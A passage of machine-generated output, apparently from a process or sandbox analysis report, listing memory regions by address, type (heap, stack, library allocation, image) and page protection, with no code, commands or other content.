page read and write
34A1000
heap
page read and write
9A4000
heap
page read and write
2EA0000
trusted library allocation
page read and write
6D5000
unkown
page readonly
33B4000
heap
page read and write
3144000
heap
page read and write
2F54000
heap
page read and write
3144000
heap
page read and write
8356000
heap
page read and write
2F54000
heap
page read and write
2EA0000
trusted library allocation
page read and write
34A1000
heap
page read and write
34A1000
heap
page read and write
82A4000
heap
page read and write
33B4000
heap
page read and write
CDE000
stack
page read and write
2F54000
heap
page read and write
3144000
heap
page read and write
34A1000
heap
page read and write
33B4000
heap
page read and write
354E000
stack
page read and write
54A0000
heap
page read and write
33B5000
heap
page read and write
2AC0000
trusted library allocation
page read and write
2EA0000
trusted library allocation
page read and write
824000
unkown
page readonly
33E0000
trusted library allocation
page read and write
33B2000
heap
page read and write
2740000
unclassified section
page readonly
2F54000
heap
page read and write
33E0000
trusted library allocation
page read and write
3144000
heap
page read and write
34A1000
heap
page read and write
350E000
stack
page read and write
3463000
heap
page read and write
8298000
heap
page read and write
33E0000
trusted library allocation
page read and write
34A1000
heap
page read and write
3144000
heap
page read and write
33B4000
heap
page read and write
33E0000
trusted library allocation
page read and write
33B4000
heap
page read and write
82B1000
heap
page read and write
34A1000
heap
page read and write
32B2000
heap
page read and write
34A1000
heap
page read and write
559A000
heap
page read and write
559A000
heap
page read and write
2EA0000
trusted library allocation
page read and write
323C000
stack
page read and write
114E000
stack
page read and write
34A1000
heap
page read and write
33B4000
heap
page read and write
34A1000
heap
page read and write
70C000
unkown
page readonly
33A0000
heap
page read and write
56F8000
heap
page read and write
3B5A000
heap
page read and write
33B4000
heap
page read and write
7D0000
heap
page read and write
34A1000
heap
page read and write
33E0000
trusted library allocation
page read and write
33B4000
heap
page read and write
34A1000
heap
page read and write
3144000
heap
page read and write
3A46000
heap
page read and write
34A1000
heap
page read and write
2F55000
heap
page read and write
2AC0000
trusted library allocation
page read and write
34A1000
heap
page read and write
34A1000
heap
page read and write
2F55000
heap
page read and write
2F54000
heap
page read and write
32B7000
heap
page read and write
34A1000
heap
page read and write
9BF000
unkown
page read and write
33CA000
heap
page read and write
34A1000
heap
page read and write
34A1000
heap
page read and write
2EA0000
trusted library allocation
page read and write
3145000
heap
page read and write
34A1000
heap
page read and write
2F54000
heap
page read and write
33B4000
heap
page read and write
E28000
heap
page read and write
34A1000
heap
page read and write
32D0000
heap
page read and write
960000
unkown
page readonly
34A1000
heap
page read and write
34A1000
heap
page read and write
34A1000
heap
page read and write
34A1000
heap
page read and write
33B4000
heap
page read and write
73C000
stack
page read and write
2AC0000
trusted library allocation
page read and write
34A1000
heap
page read and write
3144000
heap
page read and write
3144000
heap
page read and write
34A1000
heap
page read and write
30FD000
stack
page read and write
32A0000
unclassified section
page readonly
34A1000
heap
page read and write
33B4000
heap
page read and write
34A1000
heap
page read and write
34A1000
heap
page read and write
33B4000
heap
page read and write
1449000
heap
page read and write
940000
unclassified section
page readonly
3144000
heap
page read and write
32A3000
heap
page read and write
4810000
heap
page read and write
34A1000
heap
page read and write
34A1000
heap
page read and write
2F54000
heap
page read and write
3412000
heap
page read and write
2F54000
heap
page read and write
2EA0000
trusted library allocation
page read and write
30EC000
stack
page read and write
3144000
heap
page read and write
3144000
heap
page read and write
34EE000
stack
page read and write
2F54000
heap
page read and write
34A1000
heap
page read and write
C9F000
stack
page read and write
2F54000
heap
page read and write
35BD000
heap
page read and write
834A000
heap
page read and write
23E0000
heap
page read and write
34A1000
heap
page read and write
34A1000
heap
page read and write
960000
unkown
page readonly
34A1000
heap
page read and write
542E000
stack
page read and write
2AC0000
trusted library allocation
page read and write
5180000
unclassified section
page readonly
34A1000
heap
page read and write
2F54000
heap
page read and write
33E0000
trusted library allocation
page read and write
2F55000
heap
page read and write
9BF000
unkown
page read and write
18C000
stack
page read and write
33B4000
heap
page read and write
3144000
heap
page read and write
364B000
heap
page read and write
46EF000
stack
page read and write
34A1000
heap
page read and write
34A1000
heap
page read and write
34A1000
heap
page read and write
2F55000
heap
page read and write
34A1000
heap
page read and write
2AC0000
trusted library allocation
page read and write
3144000
heap
page read and write
82B4000
heap
page read and write
34A1000
heap
page read and write
2F54000
heap
page read and write
2F54000
heap
page read and write
32BC000
stack
page read and write
1405000
heap
page read and write
34A1000
heap
page read and write
34A1000
heap
page read and write
33B4000
heap
page read and write
34BB000
stack
page read and write
34A1000
heap
page read and write
34A1000
heap
page read and write
2AC0000
trusted library allocation
page read and write
2750000
unclassified section
page readonly
2F54000
heap
page read and write
33B4000
heap
page read and write
33B5000
heap
page read and write
34A1000
heap
page read and write
33B4000
heap
page read and write
9E0000
unkown
page readonly
5549000
heap
page read and write
33E0000
trusted library allocation
page read and write
90C000
stack
page read and write
54B3000
heap
page read and write
34A1000
heap
page read and write
354E000
stack
page read and write
836E000
heap
page read and write
2F54000
heap
page read and write
3144000
heap
page read and write
2AC0000
trusted library allocation
page read and write
34A1000
heap
page read and write
2F54000
heap
page read and write
33B4000
heap
page read and write
10FE000
heap
page read and write
2AC0000
trusted library allocation
page read and write
2EA0000
trusted library allocation
page read and write
3144000
heap
page read and write
2AC0000
trusted library allocation
page read and write
33B4000
heap
page read and write
82BA000
heap
page read and write
33E0000
trusted library allocation
page read and write
3403000
heap
page read and write
2C10000
heap
page read and write
33B4000
heap
page read and write
543E000
stack
page read and write
A854000
heap
page read and write
2F54000
heap
page read and write
3405000
heap
page read and write
34A1000
heap
page read and write
2EA0000
trusted library allocation
page read and write
3406000
heap
page read and write
6D8000
heap
page read and write
33B4000
heap
page read and write
2F54000
heap
page read and write
33E0000
trusted library allocation
page read and write
3144000
heap
page read and write
34A1000
heap
page read and write
3144000
heap
page read and write
34A1000
heap
page read and write
323B000
stack
page read and write
3B4E000
stack
page read and write
34A1000
heap
page read and write
33B5000
heap
page read and write
35B8000
heap
page read and write
377E000
stack
page read and write
5530000
heap
page read and write
3144000
heap
page read and write
34A1000
heap
page read and write
D38000
unkown
page readonly
34A1000
heap
page read and write
9E0000
unkown
page readonly
13E0000
heap
page read and write
34A1000
heap
page read and write
2F90000
heap
page read and write
34A1000
heap
page read and write
2EA0000
trusted library allocation
page read and write
34A1000
heap
page read and write
D0000
unclassified section
page readonly
8320000
heap
page read and write
2AC0000
trusted library allocation
page read and write
33E0000
trusted library allocation
page read and write
2EA0000
trusted library allocation
page read and write
3390000
heap
page read and write
820000
heap
page read and write
2F54000
heap
page read and write
1420000
heap
page read and write
2F54000
heap
page read and write
760000
unclassified section
page readonly
34A1000
heap
page read and write
33E0000
trusted library allocation
page read and write
3145000
heap
page read and write
34A1000
heap
page read and write
343D000
heap
page read and write
B3EA000
direct allocation
page read and write
2EA0000
trusted library allocation
page read and write
28F0000
unclassified section
page readonly
2990000
unclassified section
page readonly
34A1000
heap
page read and write
1310000
heap
page read and write
327C000
stack
page read and write
A82A000
heap
page read and write
34A1000
heap
page read and write
323E000
stack
page read and write
33B4000
heap
page read and write
34A1000
heap
page read and write
33E0000
trusted library allocation
page read and write
8291000
heap
page read and write
5579000
heap
page read and write
34A1000
heap
page read and write
34A1000
heap
page read and write
9C3000
unkown
page readonly
33E0000
trusted library allocation
page read and write
2AC0000
trusted library allocation
page read and write
33E0000
trusted library allocation
page read and write
EC0000
heap
page read and write
33D6000
heap
page read and write
2EAB000
stack
page read and write
3144000
heap
page read and write
9F0000
heap
page read and write
34A1000
heap
page read and write
34A1000
heap
page read and write
34A1000
heap
page read and write
2CD0000
unclassified section
page readonly
3463000
heap
page read and write
2EA0000
trusted library allocation
page read and write
9DC0000
direct allocation
page read and write
5591000
heap
page read and write
34A1000
heap
page read and write
34A1000
heap
page read and write
1F0000
heap
page read and write
2EA0000
trusted library allocation
page read and write
9E1000
unkown
page execute read
2F54000
heap
page read and write
2AC0000
trusted library allocation
page read and write
4DC0000
unclassified section
page readonly
34A1000
heap
page read and write
34A1000
heap
page read and write
34A1000
heap
page read and write
33B4000
heap
page read and write
34A1000
heap
page read and write
34A1000
heap
page read and write
2AC0000
trusted library allocation
page read and write
A829000
heap
page read and write
34A1000
heap
page read and write
8291000
heap
page read and write
2F54000
heap
page read and write
37C1000
heap
page read and write
33B4000
heap
page read and write
34A1000
heap
page read and write
CFC000
stack
page read and write
34A1000
heap
page read and write
8348000
heap
page read and write
34A1000
heap
page read and write
33B4000
heap
page read and write
33E0000
trusted library allocation
page read and write
FF0000
heap
page read and write
34A1000
heap
page read and write
3144000
heap
page read and write
2AC0000
trusted library allocation
page read and write
34A1000
heap
page read and write
33E0000
trusted library allocation
page read and write
7AD000
unkown
page readonly
33B4000
heap
page read and write
3145000
heap
page read and write
CB0000
unclassified section
page readonly
34A1000
heap
page read and write
3230000
heap
page read and write
34A1000
heap
page read and write
33B4000
heap
page read and write
34A1000
heap
page read and write
33B4000
heap
page read and write
836C000
heap
page read and write
557A000
heap
page read and write
3144000
heap
page read and write
2F54000
heap
page read and write
3144000
heap
page read and write
2EA0000
trusted library allocation
page read and write
1400000
heap
page read and write
32B7000
heap
page read and write
358E000
stack
page read and write
51B0000
heap
page read and write
34A1000
heap
page read and write
D60000
unkown
page readonly
35CE000
stack
page read and write
34A1000
heap
page read and write
32ED000
heap
page read and write
33AB000
heap
page read and write
33B4000
heap
page read and write
34A1000
heap
page read and write
231C000
stack
page read and write
34A1000
heap
page read and write
33B4000
heap
page read and write
33B4000
heap
page read and write
2AC0000
trusted library allocation
page read and write
ECA000
heap
page read and write
33B4000
heap
page read and write
32F7000
heap
page read and write
34A1000
heap
page read and write
2AC0000
trusted library allocation
page read and write
33B4000
heap
page read and write
38E7000
heap
page read and write
5310000
heap
page read and write
34A1000
heap
page read and write
2F54000
heap
page read and write
34A1000
heap
page read and write
34A1000
heap
page read and write
53FF000
stack
page read and write
33B4000
heap
page read and write
34A1000
heap
page read and write
2F54000
heap
page read and write
2EA0000
trusted library allocation
page read and write
344F000
heap
page read and write
3144000
heap
page read and write
34A1000
heap
page read and write
33B4000
heap
page read and write
3260000
heap
page read and write
34A1000
heap
page read and write
34A1000
heap
page read and write
3144000
heap
page read and write
3A48000
heap
page read and write
2AC0000
trusted library allocation
page read and write
3280000
heap
page read and write
378F000
stack
page read and write
33E0000
trusted library allocation
page read and write
34A1000
heap
page read and write
3144000
heap
page read and write
3144000
heap
page read and write
3A4D000
heap
page read and write
2F54000
heap
page read and write
2EA0000
trusted library allocation
page read and write
3B50000
heap
page read and write
33BD000
stack
page read and write
2F54000
heap
page read and write
34A1000
heap
page read and write
34A1000
heap
page read and write
81E000
stack
page read and write
2C18000
heap
page read and write
33B5000
heap
page read and write
33B4000
heap
page read and write
34A1000
heap
page read and write
955000
heap
page read and write
34A1000
heap
page read and write
2F54000
heap
page read and write
2FAF000
stack
page read and write
34A1000
heap
page read and write
9C3F000
stack
page read and write
6E3000
unkown
page readonly
34A1000
heap
page read and write
34A1000
heap
page read and write
34A1000
heap
page read and write
341C000
heap
page read and write
34A1000
heap
page read and write
34A1000
heap
page read and write
34A1000
heap
page read and write
3144000
heap
page read and write
2D8E000
stack
page read and write
2EA0000
trusted library allocation
page read and write
5506000
heap
page read and write
2FEC000
stack
page read and write
2AC0000
trusted library allocation
page read and write
2F54000
heap
page read and write
34A1000
heap
page read and write
730000
unkown
page read and write
340E000
heap
page read and write
3144000
heap
page read and write
8356000
heap
page read and write
34A1000
heap
page read and write
33E2000
heap
page read and write
5588000
heap
page read and write
34A1000
heap
page read and write
33E0000
trusted library allocation
page read and write
33B4000
heap
page read and write
3144000
heap
page read and write
836F000
heap
page read and write
34A1000
heap
page read and write
3CAA000
heap
page read and write
33B4000
heap
page read and write
3144000
heap
page read and write
33E2000
heap
page read and write
3392000
heap
page read and write
33E0000
trusted library allocation
page read and write
34A1000
heap
page read and write
3144000
heap
page read and write
34A1000
heap
page read and write
82A6000
heap
page read and write
34A1000
heap
page read and write
A829000
heap
page read and write
34A1000
heap
page read and write
297C000
stack
page read and write
3144000
heap
page read and write
2F54000
heap
page read and write
34A1000
heap
page read and write
34A1000
heap
page read and write
34A1000
heap
page read and write
34A1000
heap
page read and write
753B000
stack
page read and write
3302000
heap
page read and write
2EA0000
trusted library allocation
page read and write
2F54000
heap
page read and write
2FF0000
unclassified section
page readonly
34A1000
heap
page read and write
33B4000
heap
page read and write
34A1000
heap
page read and write
33E0000
trusted library allocation
page read and write
34A1000
heap
page read and write
2F54000
heap
page read and write
3463000
heap
page read and write
33B4000
heap
page read and write
3403000
heap
page read and write
34A1000
heap
page read and write
34A1000
heap
page read and write
2AC0000
trusted library allocation
page read and write
378E000
stack
page read and write
2EA0000
trusted library allocation
page read and write
9C3000
unkown
page readonly
5577000
heap
page read and write
32C9000
heap
page read and write
34A1000
heap
page read and write
34A1000
heap
page read and write
836C000
heap
page read and write
3651000
heap
page read and write
34A1000
heap
page read and write
35B0000
heap
page read and write
3396000
heap
page read and write
3371000
heap
page read and write
2F54000
heap
page read and write
5571000
heap
page read and write
547B000
heap
page read and write
34A1000
heap
page read and write
34A1000
heap
page read and write
8A0000
unclassified section
page readonly
34A1000
heap
page read and write
34A1000
heap
page read and write
A5A0000
remote allocation
page read and write
9C3000
unkown
page readonly
3282000
heap
page read and write
56A0000
heap
page read and write
34A1000
heap
page read and write
67D000
stack
page read and write
2AC0000
trusted library allocation
page read and write
33B4000
heap
page read and write
33E0000
trusted library allocation
page read and write
3460000
heap
page read and write
2AC0000
trusted library allocation
page read and write
34A1000
heap
page read and write
33B4000
heap
page read and write
34A1000
heap
page read and write
2F54000
heap
page read and write
2F54000
heap
page read and write
2AC0000
trusted library allocation
page read and write
34A1000
heap
page read and write
345A000
heap
page read and write
2AC0000
trusted library allocation
page read and write
12FE000
stack
page read and write
2F54000
heap
page read and write
34A1000
heap
page read and write
3144000
heap
page read and write
33E0000
trusted library allocation
page read and write
2AC0000
trusted library allocation
page read and write
2F20000
unclassified section
page readonly
34A1000
heap
page read and write
3CAE000
heap
page read and write
33B4000
heap
page read and write
34A1000
heap
page read and write
2F55000
heap
page read and write
33DF000
heap
page read and write
836C000
heap
page read and write
33B4000
heap
page read and write
7A0000
heap
page read and write
3403000
heap
page read and write
3144000
heap
page read and write
3490000
heap
page read and write
8329000
heap
page read and write
2630000
heap
page read and write
34A1000
heap
page read and write
2F54000
heap
page read and write
34A1000
heap
page read and write
33B4000
heap
page read and write
358E000
stack
page read and write
5470000
heap
page read and write
9A0000
heap
page read and write
33B5000
heap
page read and write
33B4000
heap
page read and write
ECE000
heap
page read and write
34A1000
heap
page read and write
34A1000
heap
page read and write
2D5B000
stack
page read and write
2BBA000
stack
page read and write
34A1000
heap
page read and write
33B4000
heap
page read and write
34A1000
heap
page read and write
34A1000
heap
page read and write
33B4000
heap
page read and write
34A1000
heap
page read and write
34A1000
heap
page read and write
34A1000
heap
page read and write
E0E000
stack
page read and write
34A1000
heap
page read and write
34A1000
heap
page read and write
3CA8000
heap
page read and write
D2D000
stack
page read and write
3145000
heap
page read and write
33B4000
heap
page read and write
33E0000
trusted library allocation
page read and write
2B40000
heap
page read and write
2FB0000
unclassified section
page readonly
3310000
heap
page read and write
3144000
heap
page read and write
3340000
heap
page read and write
9A4000
heap
page read and write
33B4000
heap
page read and write
2DD0000
unclassified section
page readonly
33E0000
trusted library allocation
page read and write
33B4000
heap
page read and write
557D000
heap
page read and write
295C000
stack
page read and write
33B4000
heap
page read and write
34A1000
heap
page read and write
33B4000
heap
page read and write
2BF0000
heap
page read and write
3A40000
heap
page read and write
5475000
heap
page read and write
34A1000
heap
page read and write
291C000
stack
page read and write
34A1000
heap
page read and write
34A1000
heap
page read and write
9BF000
unkown
page write copy
33B4000
heap
page read and write
2F54000
heap
page read and write
E6D000
heap
page read and write
28A0000
unclassified section
page readonly
82A8000
heap
page read and write
9A4000
heap
page read and write
34A1000
heap
page read and write
2F54000
heap
page read and write
2EA0000
trusted library allocation
page read and write
5570000
heap
page read and write
2F54000
heap
page read and write
34A1000
heap
page read and write
F5F000
stack
page read and write
D2D000
unkown
page write copy
2A80000
heap
page read and write
33B4000
heap
page read and write
34A1000
heap
page read and write
33E0000
trusted library allocation
page read and write
2F54000
heap
page read and write
28A8000
heap
page read and write
34A1000
heap
page read and write
34A1000
heap
page read and write
34A1000
heap
page read and write
2F54000
heap
page read and write
960000
unkown
page readonly
34A1000
heap
page read and write
33E0000
trusted library allocation
page read and write
3290000
heap
page read and write
836C000
heap
page read and write
32F7000
heap
page read and write
9C8E000
stack
page read and write
33DE000
heap
page read and write
581000
unkown
page execute read
33E0000
trusted library allocation
page read and write
33D0000
heap
page read and write
A9AA000
heap
page read and write
3140000
heap
page read and write
2F40000
unclassified section
page readonly
82D0000
heap
page read and write
2F54000
heap
page read and write
34A1000
heap
page read and write
82B4000
heap
page read and write
3431000
heap
page read and write
35BC000
heap
page read and write
33E0000
trusted library allocation
page read and write
3144000
heap
page read and write
54E8000
heap
page read and write
33E0000
trusted library allocation
page read and write
2EA0000
trusted library allocation
page read and write
34A1000
heap
page read and write
9A9000
unkown
page readonly
34A1000
heap
page read and write
33B4000
heap
page read and write
5533000
heap
page read and write
2F54000
heap
page read and write
9C3000
unkown
page readonly
32B2000
heap
page read and write
3144000
heap
page read and write
3144000
heap
page read and write
34A1000
heap
page read and write
34A1000
heap
page read and write
34A1000
heap
page read and write
33B5000
heap
page read and write
37B6000
heap
page read and write
33E0000
trusted library allocation
page read and write
3730000
heap
page read and write
129E000
stack
page read and write
34A1000
heap
page read and write
34A1000
heap
page read and write
38E3000
heap
page read and write
70C000
unkown
page readonly
2FBC000
stack
page read and write
3A46000
heap
page read and write
3144000
heap
page read and write
34A1000
heap
page read and write
3145000
heap
page read and write
34A1000
heap
page read and write
2F54000
heap
page read and write
5490000
heap
page read and write
3220000
heap
page read and write
3144000
heap
page read and write
34A1000
heap
page read and write
970000
unclassified section
page readonly
34A1000
heap
page read and write
34A1000
heap
page read and write
34A1000
heap
page read and write
3144000
heap
page read and write
34A1000
heap
page read and write
33B4000
heap
page read and write
3144000
heap
page read and write
950000
heap
page read and write
34A1000
heap
page read and write
9A9000
unkown
page readonly
34A1000
heap
page read and write
4EB0000
heap
page read and write
34A1000
heap
page read and write
34A1000
heap
page read and write
34A1000
heap
page read and write
347F000
stack
page read and write
34A1000
heap
page read and write
3144000
heap
page read and write
2EA0000
trusted library allocation
page read and write
82B8000
heap
page read and write
34A1000
heap
page read and write
960000
unclassified section
page readonly
2DB0000
trusted library allocation
page read and write
2AC0000
trusted library allocation
page read and write
33E0000
trusted library allocation
page read and write
33B4000
heap
page read and write
CA0000
unclassified section
page readonly
3240000
unclassified section
page readonly
5587000
heap
page read and write
33B4000
heap
page read and write
988E000
stack
page read and write
A829000
heap
page read and write
2F55000
heap
page read and write
34A1000
heap
page read and write
33B5000
heap
page read and write
33E0000
trusted library allocation
page read and write
3144000
heap
page read and write
2F50000
unclassified section
page readonly
3144000
heap
page read and write
2F54000
heap
page read and write
34A1000
heap
page read and write
5429000
heap
page read and write
2EA0000
trusted library allocation
page read and write
37B9000
heap
page read and write
3B53000
heap
page read and write
33B4000
heap
page read and write
37B9000
heap
page read and write
34A1000
heap
page read and write
34A1000
heap
page read and write
2F54000
heap
page read and write
34A1000
heap
page read and write
3429000
heap
page read and write
2FCC000
stack
page read and write
54EF000
heap
page read and write
33B4000
heap
page read and write
32ED000
heap
page read and write
3144000
heap
page read and write
5320000
heap
page read and write
34A1000
heap
page read and write
890000
unclassified section
page readonly
2C3E000
stack
page read and write
34A1000
heap
page read and write
2F54000
heap
page read and write
3270000
heap
page read and write
34A1000
heap
page read and write
3144000
heap
page read and write
2EA0000
trusted library allocation
page read and write
34A1000
heap
page read and write
2AC0000
trusted library allocation
page read and write
33B5000
heap
page read and write
33B4000
heap
page read and write
3413000
heap
page read and write
33B4000
heap
page read and write
34A1000
heap
page read and write
5421000
heap
page read and write
33E0000
trusted library allocation
page read and write
9A9000
unkown
page readonly
33E0000
trusted library allocation
page read and write
3350000
trusted library allocation
page read and write
33CB000
heap
page read and write
33E0000
trusted library allocation
page read and write
34A1000
heap
page read and write
33FD000
heap
page read and write
33B4000
heap
page read and write
3144000
heap
page read and write
33E0000
trusted library allocation
page read and write
34A1000
heap
page read and write
2EA0000
trusted library allocation
page read and write
34A1000
heap
page read and write
3144000
heap
page read and write
D43000
unkown
page readonly
2F54000
heap
page read and write
33E2000
heap
page read and write
34A1000
heap
page read and write
32A3000
heap
page read and write
34A1000
heap
page read and write
5553000
heap
page read and write
3CA8000
heap
page read and write
32CE000
stack
page read and write
34A1000
heap
page read and write
3280000
heap
page read and write
2F54000
heap
page read and write
104F000
stack
page read and write
34A1000
heap
page read and write
34A1000
heap
page read and write
56F8000
heap
page read and write
33B4000
heap
page read and write
3428000
heap
page read and write
33B4000
heap
page read and write
54EF000
heap
page read and write
3144000
heap
page read and write
5566000
heap
page read and write
A9AB000
heap
page read and write
34A1000
heap
page read and write
34A1000
heap
page read and write
34A1000
heap
page read and write
34A1000
heap
page read and write
A470000
heap
page read and write
EB0000
heap
page read and write
33D5000
heap
page read and write
829D000
heap
page read and write
34A1000
heap
page read and write
2AC0000
trusted library allocation
page read and write
34A1000
heap
page read and write
33E0000
trusted library allocation
page read and write
33B4000
heap
page read and write
8358000
heap
page read and write
824000
unkown
page readonly
33E0000
trusted library allocation
page read and write
34A1000
heap
page read and write
2EA0000
trusted library allocation
page read and write
34A1000
heap
page read and write
833E000
heap
page read and write
33B4000
heap
page read and write
2AC0000
trusted library allocation
page read and write
34A1000
heap
page read and write
32DC000
heap
page read and write
3A47000
heap
page read and write
33E0000
trusted library allocation
page read and write
33B0000
heap
page read and write
34A1000
heap
page read and write
A7FF000
stack
page read and write
33B4000
heap
page read and write
3144000
heap
page read and write
2F54000
heap
page read and write
2AC0000
trusted library allocation
page read and write
FE0000
unclassified section
page readonly
6F80000
heap
page read and write
33B4000
heap
page read and write
2EA0000
trusted library allocation
page read and write
33E0000
trusted library allocation
page read and write
2F54000
heap
page read and write
34A1000
heap
page read and write
940000
heap
page read and write
33E0000
trusted library allocation
page read and write
3CB1000
heap
page read and write
34A1000
heap
page read and write
5553000
heap
page read and write
3B52000
heap
page read and write
33B4000
heap
page read and write
3144000
heap
page read and write
34A1000
heap
page read and write
A855000
heap
page read and write
2F54000
heap
page read and write
34A1000
heap
page read and write
37CE000
stack
page read and write
34A1000
heap
page read and write
34A1000
heap
page read and write
143D000
heap
page read and write
34A1000
heap
page read and write
2D4E000
stack
page read and write
4E70000
heap
page read and write
34A1000
heap
page read and write
63D000
stack
page read and write
3144000
heap
page read and write
2EA0000
trusted library allocation
page read and write
34A1000
heap
page read and write
34A1000
heap
page read and write
33B4000
heap
page read and write
3144000
heap
page read and write
2F54000
heap
page read and write
34A1000
heap
page read and write
34A1000
heap
page read and write
C70000
unclassified section
page readonly
2A70000
heap
page read and write
33B4000
heap
page read and write
38E7000
heap
page read and write
2F54000
heap
page read and write
348E000
stack
page read and write
D43000
unkown
page readonly
3144000
heap
page read and write
323D000
heap
page read and write
B305000
direct allocation
page read and write
35FE000
stack
page read and write
34A1000
heap
page read and write
3144000
heap
page read and write
3144000
heap
page read and write
8358000
heap
page read and write
34A1000
heap
page read and write
356E000
stack
page read and write
34A1000
heap
page read and write
3144000
heap
page read and write
34A1000
heap
page read and write
34A1000
heap
page read and write
34A1000
heap
page read and write
33B4000
heap
page read and write
557F000
stack
page read and write
9C3000
unkown
page readonly
9A4000
heap
page read and write
33E0000
trusted library allocation
page read and write
2F54000
heap
page read and write
2A3C000
stack
page read and write
34A1000
heap
page read and write
34A1000
heap
page read and write
3145000
heap
page read and write
34A1000
heap
page read and write
9A9000
unkown
page readonly
34A1000
heap
page read and write
34A1000
heap
page read and write
34A1000
heap
page read and write
8383000
heap
page read and write
34A1000
heap
page read and write
3A48000
heap
page read and write
33B4000
heap
page read and write
34A1000
heap
page read and write
3220000
heap
page read and write
8299000
heap
page read and write
8341000
heap
page read and write
34A1000
heap
page read and write
34A1000
heap
page read and write
34A1000
heap
page read and write
33E0000
trusted library allocation
page read and write
4FD0000
heap
page read and write
961000
unkown
page execute read
2AC0000
trusted library allocation
page read and write
34A1000
heap
page read and write
2F54000
heap
page read and write
3200000
unclassified section
page readonly
329C000
heap
page read and write
34A1000
heap
page read and write
2EA0000
trusted library allocation
page read and write
2EA0000
trusted library allocation
page read and write
33E0000
trusted library allocation
page read and write
31F0000
heap
page read and write
3ACE000
stack
page read and write
33B4000
heap
page read and write
34A1000
heap
page read and write
3B5A000
heap
page read and write
34A0000
heap
page read and write
2F54000
heap
page read and write
2F55000
heap
page read and write
34A1000
heap
page read and write
34A1000
heap
page read and write
330D000
stack
page read and write
52CE000
stack
page read and write
2EA0000
trusted library allocation
page read and write
2F54000
heap
page read and write
33E0000
trusted library allocation
page read and write
3320000
heap
page read and write
33AF000
heap
page read and write
773F000
stack
page read and write
2F54000
heap
page read and write
33B4000
heap
page read and write
329B000
heap
page read and write
33B4000
heap
page read and write
34A1000
heap
page read and write
3144000
heap
page read and write
2AC0000
trusted library allocation
page read and write
3144000
heap
page read and write
33E0000
trusted library allocation
page read and write
569E000
stack
page read and write
3A0F000
stack
page read and write
34A1000
heap
page read and write
34A1000
heap
page read and write
2638000
heap
page read and write
2EA0000
trusted library allocation
page read and write
2F54000
heap
page read and write
82F4000
heap
page read and write
2FE0000
heap
page read and write
33E0000
trusted library allocation
page read and write
3B0F000
stack
page read and write
37BE000
heap
page read and write
2F54000
heap
page read and write
34A1000
heap
page read and write
34A1000
heap
page read and write
34A1000
heap
page read and write
DDF000
stack
page read and write
55BE000
stack
page read and write
2EA0000
trusted library allocation
page read and write
2BEF000
stack
page read and write
FA0000
heap
page read and write
2EA0000
trusted library allocation
page read and write
11C1000
heap
page read and write
2AC0000
trusted library allocation
page read and write
9DC9000
heap
page read and write
3144000
heap
page read and write
34A1000
heap
page read and write
361D000
stack
page read and write
35BC000
stack
page read and write
34A1000
heap
page read and write
34A1000
heap
page read and write
35AF000
stack
page read and write
34A1000
heap
page read and write
34A1000
heap
page read and write
2EA0000
trusted library allocation
page read and write
FEE000
stack
page read and write
34A1000
heap
page read and write
34A1000
heap
page read and write
34A1000
heap
page read and write
3B57000
heap
page read and write
3144000
heap
page read and write
33B4000
heap
page read and write
557F000
heap
page read and write
2EA0000
trusted library allocation
page read and write
33B4000
heap
page read and write
34A1000
heap
page read and write
33B4000
heap
page read and write
34A1000
heap
page read and write
3370000
heap
page read and write
33E0000
trusted library allocation
page read and write
2F54000
heap
page read and write
2EA0000
trusted library allocation
page read and write
D50000
unkown
page readonly
239E000
stack
page read and write
34A1000
heap
page read and write
2AC0000
trusted library allocation
page read and write
34A1000
heap
page read and write
34A1000
heap
page read and write
34A1000
heap
page read and write
2D6E000
stack
page read and write
34A1000
heap
page read and write
34A1000
heap
page read and write
2F54000
heap
page read and write
33B4000
heap
page read and write
F4E000
stack
page read and write
3144000
heap
page read and write
961000
unkown
page execute read
2F54000
heap
page read and write
2F54000
heap
page read and write
33E0000
trusted library allocation
page read and write
2AC0000
trusted library allocation
page read and write
31CE000
stack
page read and write
34A1000
heap
page read and write
33B4000
heap
page read and write
D38000
unkown
page write copy
33B4000
heap
page read and write
8110000
direct allocation
page read and write
34A1000
heap
page read and write
2EA0000
trusted library allocation
page read and write
2F54000
heap
page read and write
40E0000
heap
page read and write
34A1000
heap
page read and write
5551000
heap
page read and write
34A1000
heap
page read and write
344F000
heap
page read and write
34A1000
heap
page read and write
363C000
stack
page read and write
559A000
heap
page read and write
3144000
heap
page read and write
33B4000
heap
page read and write
34A1000
heap
page read and write
2AC0000
trusted library allocation
page read and write
34A1000
heap
page read and write
34A1000
heap
page read and write
33E0000
trusted library allocation
page read and write
364D000
heap
page read and write
2ACE000
stack
page read and write
34A1000
heap
page read and write
2F54000
heap
page read and write
33E0000
trusted library allocation
page read and write
34A1000
heap
page read and write
2F54000
heap
page read and write
54AE000
heap
page read and write
34A1000
heap
page read and write
56F1000
heap
page read and write
2EA0000
trusted library allocation
page read and write
34A1000
heap
page read and write
2EA0000
trusted library allocation
page read and write
9AFF000
stack
page read and write
33B4000
heap
page read and write
34A1000
heap
page read and write
2AC0000
trusted library allocation
page read and write
34A1000
heap
page read and write
2AC0000
trusted library allocation
page read and write
2F54000
heap
page read and write
23DE000
stack
page read and write
998F000
stack
page read and write
33B4000
heap
page read and write
32BB000
heap
page read and write
34A1000
heap
page read and write
2F48000
heap
page read and write
34A1000
heap
page read and write
B331000
direct allocation
page read and write
34A1000
heap
page read and write
961000
unkown
page execute read
3427000
heap
page read and write
5572000
heap
page read and write
34A1000
heap
page read and write
33B4000
heap
page read and write
9A4000
heap
page read and write
337E000
stack
page read and write
34A1000
heap
page read and write
3144000
heap
page read and write
33B4000
heap
page read and write
82C9000
heap
page read and write
34A1000
heap
page read and write
28A0000
heap
page read and write
330F000
stack
page read and write
7AD000
unkown
page readonly
34A1000
heap
page read and write
3CA9000
heap
page read and write
3144000
heap
page read and write
3144000
heap
page read and write
34A1000
heap
page read and write
34A1000
heap
page read and write
73B000
unkown
page read and write
2F54000
heap
page read and write
3144000
heap
page read and write
8356000
heap
page read and write
2EA0000
trusted library allocation
page read and write
2F54000
heap
page read and write
333E000
stack
page read and write
2F54000
heap
page read and write
3145000
heap
page read and write
2EA0000
trusted library allocation
page read and write
2EA0000
trusted library allocation
page read and write
33B5000
heap
page read and write
3144000
heap
page read and write
34A1000
heap
page read and write
3144000
heap
page read and write
3144000
heap
page read and write
2AC0000
trusted library allocation
page read and write
3144000
heap
page read and write
3010000
heap
page read and write
35F0000
heap
page read and write
275E000
stack
page read and write
13A0000
unclassified section
page readonly
34A1000
heap
page read and write
34A1000
heap
page read and write
35A0000
heap
page read and write
33E0000
trusted library allocation
page read and write
2900000
